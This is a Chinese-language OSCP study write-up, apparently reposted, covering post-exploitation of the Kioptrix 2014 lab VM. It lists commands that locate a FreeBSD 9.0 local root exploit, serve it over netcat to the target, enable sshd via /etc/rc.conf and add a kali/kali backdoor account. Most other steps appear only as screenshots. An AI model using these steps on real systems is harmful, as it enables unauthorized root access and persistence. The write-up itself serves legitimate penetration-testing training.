OSCP-Kioptrix2014-3 后渗透测试

最新推荐文章于 2024-08-04 15:33:18 发布
最新推荐文章于 2024-08-04 15:33:18 发布
阅读量245 收藏
点赞数
原文链接:http://www.cnblogs.com/lanqie/p/11102885.html
版权

拿到root权限

  • 之前的努力,最终获得了两个session
    1226359-20190628151007275-1573109276.png

  • 尝试看看该操作系统的漏洞
    1226359-20190628151335180-1511074722.png

kali:

searchsploit freebsd 9.0

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/

cd Desktop/

nc -lp 5656 < 28718.c -q 1

msf session:

1226359-20190628152340673-1560660739.png

1226359-20190628153006441-118072754.png

提权成功

echo '' >> freebsd.c 之前编译报错,所以加个空行

  • 尝试修改root密码
    1226359-20190628153323259-720988200.png
    看来高兴早了

修改ssh配置

1226359-20190628154011964-1742562410.png

echo sshd_enable="YES" >> /etc/rc.conf

    
/etc/rc.d/sshd start
/etc/rc.conf: sshd.enable=YES: not found
Starting sshd.

添加用户(kali/kali):

adduser
...

测试连接:
1226359-20190628155020710-829420618.png

尝试一些操作:

$ cd /root/
$ touch test.txt
touch: test.txt: Permission denied

再次提权:

1226359-20190628155913942-1243024937.png

再次ssh以root登录:

1226359-20190628160117500-1591216929.png

转载于:https://www.cnblogs.com/lanqie/p/11102885.html

weixin_30316097
关注
oscp渗透测试认证该从哪里学起
weixin_70101757的博客
02-23 569
而是直接开始实验室,我用的方法是进行全子网扫描,帮助我快速识别实验室机器上的服务,可以深入了解扫描方法。不要搜索MySql 5.x.x版本的漏洞,而是键入“github MySql 5.x.x漏洞”,当你看到前面的POC和脚本时,你会感到非常震惊。备考的伙伴是在机构报名后的学员群里聊得来的朋友,因为大家的进度都一样,顺便还能在课后一起复盘整套知识点。如果你能获得70分,你就处于一个好的位置,接下来用OSCP报告模板练习写报告,练习报告将帮助您了解笔记的哪些方面需要改进。省去麻烦,禁用烦人的防火墙。
【Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1684
Oscp备考
OSCP网络安全认证
10-19
OSCP认证,是一个专门针对Kali Linux渗透测试培训课程的专业认证。该认证机构声称,OSCP认证是一个区别于所有其它认证的考试,考试全程采取手动操作的方式,而不设笔试环节。
[经验分享] OSCP 渗透测试认证
weixin_34186931的博客
11-17 4770
http://f4l13n5n0w.github.io/blog/2015/05/05/jing-yan-fen-xiang-oscp-shen-tou-ce-shi-ren-zheng/   “120天的旅程即将结束,以一场历时24小时没有选择题的考试,收获屠龙路上第一座里程碑。…” 这是我通过OSCP认证考试时,第一时间的感受。自豪和欣喜之情不亚于2008年我拿下CCIE R&amp;S的...
KVM2014靶场详细练习&KVM2014靶场安装&渗透靶场练习&目录穿越&Perl&反弹Shell
jockerboss的博客
02-29 906
Kioptrix 2014靶场&目录穿越&Perl&反弹Shell
VulnHub-Kioptrix2014(#5)
热门推荐
江左盟的博客
07-21 1万+
信息收集 是 啊 啊 啊
Oscp备考-Kioptrix4
weixin_44126257的博客
02-28 339
Oscp备考-Kioptrix4
【Oscp备考-Kioptrix2】
weixin_44126257的博客
09-16 2028
Oscp备考:Kioptrix Level 2
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
java红酒网站源码-oscp-notes:oscp-notes
06-05
进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称...
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 435
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
Vulnhub入门篇-Kioptrix2014
最新发布
2302_78903258的博客
08-04 1150
信息收集还是非常重要的,以及对网站的信息搜索,网站使用的中间件、系统之间的漏洞都可以拿来利用,但是我上面有不足之处,并没有获得webshell,提权就是根据FreeBSD的漏洞进行利用的。
OSCP-Kioptrix2014-2 漏洞利用
weixin_30383279的博客
06-28 382
pChart 2.1.3 文件包含漏洞 搜索漏洞 查看漏洞理由代码: hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd 之前的8080端口禁止访问,看看apache的配置: http://192.168.1.78/pChart2.1.3/examples/...
Kioptrix-2
weixin_44770698的博客
12-23 343
靶场练习
Vulnhub靶机:Kioptrix_2014,2024年最新网络安全面试真题精选
2401_83947353的博客
04-14 525
运行环境:Virtualbox和vmware攻击机:kali(192.168.56.101)靶机:Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
Vulnhub靶机系列:Kioptrix: 2014 (#5)
汗的博客
04-06 1270
这次的靶机是Vulnhub靶机: 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-2014-5,62/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
64Base_3mrgnc3
底层社会中的弱智
07-12 681
总结: 这个靶机出现了几个奇怪的端口,使用nc或者telnet命令来连接端口查看信息 nc –nv ip port telnet ip port 前期的信息收集,不仅仅是nmap 还可以使用nitko –h、whatweb等等进行收集信息 Html2dic工具可以将页面的关键字转换成字典 Wget url –rq –O xxx.out Html2dic xxx.out | sort –u > xxx.dict 使用公钥登陆的时候要将公钥的权限调制最小 ssh –p 端口
靶场64Base_3mrgnc3的解题过程及个人心路历程
qq_42364315的博客
01-29 681
正值春节,遇到了新型冠状病毒,整个人都不好了,在家里都快憋疯了,于是乎开始做靶场打发时间,顺便死一波脑细胞 ————————————————————废话分割线———————————————————————————— 首先打开靶场看到的一幕 靶场就长这个样子,没有密码 没有办法登录 这个靶场有6个flag 然后打开我的kali 将靶机和kali放到同一个网段 仅主机模式 使用命令查...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值